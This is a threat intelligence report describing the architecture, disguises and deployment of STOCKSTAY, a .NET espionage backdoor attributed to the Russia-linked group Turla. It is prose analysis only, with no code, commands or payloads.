The Latest Addition to Turla's Intelligence Gathering Apparatus
The Latest Addition to Turla’s Intelligence Gathering Apparatus
🚀 Google Threat Intelligence Group (GTIG) has conducted an in-depth analysis of a .NET backdoor, tracked as STOCKSTAY, that has been continually developed and deployed by the Russia-linked threat actor Turla (aka SUMMIT, Secret Blizzard, VENOMOUS BEAR, UAC-0194) since at least December 2022. Turla has deployed STOCKSTAY against government and military organizations in Ukraine, as well as entities with an interest in Italian foreign policy. Used for ongoing cyber espionage, this backdoor shares significant code and functional overlaps with KAZUAR, a successful toolkit previously attributed to Turla. Turla, and specifically their longstanding Snake implant, has been publicly attributed by the United States Cybersecurity and Infrastructure Security Agency (CISA) to Center 16 of Russia’s Federal Security Service (FSB). The actor remains active and continues to evolve its delivery methods, as demonstrated by its deployment of specialized scripts to intercept secure communications from Signal Messenger users, its hijacking of legacy criminal botnets to target Ukrainian organizations, and its recent campaigns targeting military defense sectors using the highly sophisticated KAZUAR toolkit.
STOCKSTAY is a multi-component backdoor written in .NET, using the Windows Forms framework, which communicates with its command and control (C2) via a secure WebSocket connection, utilizing the open-source websocket-sharp library. STOCKSTAY consists of several distinct components that communicate with one another via an inter-process communication (IPC) channel, based on the exchange of WM_COPYDATA messages. STOCKSTAY was originally designed to masquerade as a stock market data viewing tool, incorporating this disguise in both its file naming scheme and its storage of implant configuration, control messages, and response data. While initial versions of the malware observed by GTIG retained the internal aspects of this disguise, in 2025 we identified variants of STOCKSTAY masquerading as other benign applications, such as PDF viewers and calculator utilities.
The STOCKSTAY ecosystem includes STOCKSTAY.STOCKBROKER, a proxy-aware tunneler which provides network communication capabilities. STOCKSTAY.STOCKBROKER can be instructed to establish a secure WebSocket connection to a specified remote server, after which it acts as a relay between the server and the STOCKSTAY.STOCKMARKET orchestrator. STOCKSTAY.STOCKMARKET, internally referred to as “cor”, is the orchestrator of the STOCKSTAY ecosystem, and enables the implant’s configurability. The malware’s configuration is loaded from an encrypted on-disk configuration file which specifies several options regarding the malware’s execution, including the details of the remote WebSocket server required by STOCKSTAY.STOCKBROKER. Additionally, STOCKSTAY.STOCKTRADER, internally referred to as “sys”, is the backdoor component of the STOCKSTAY ecosystem, and supports a range of registry, file, and command execution operations on the infected host.
GTIG identified a publicly accessible GitHub repository containing a Python implementation of the victim-facing STOCKSTAY WebSocket server controller. The lightweight design of the server component appears to supplement the threat actor’s usage of third-party hosting platforms such as Render platform which provides a platform for hosting web services, including WebSockets. This architecture somewhat resembles Turla’s multi-hop KAZUAR C2 infrastructure. The threat actor(s) involved in STOCKSTAY operations appear to have an affinity for integrating academia and diplomacy into their infrastructure and lure/decoy content, including compromising an email account belonging to a Ukrainian university to disseminate phishing emails.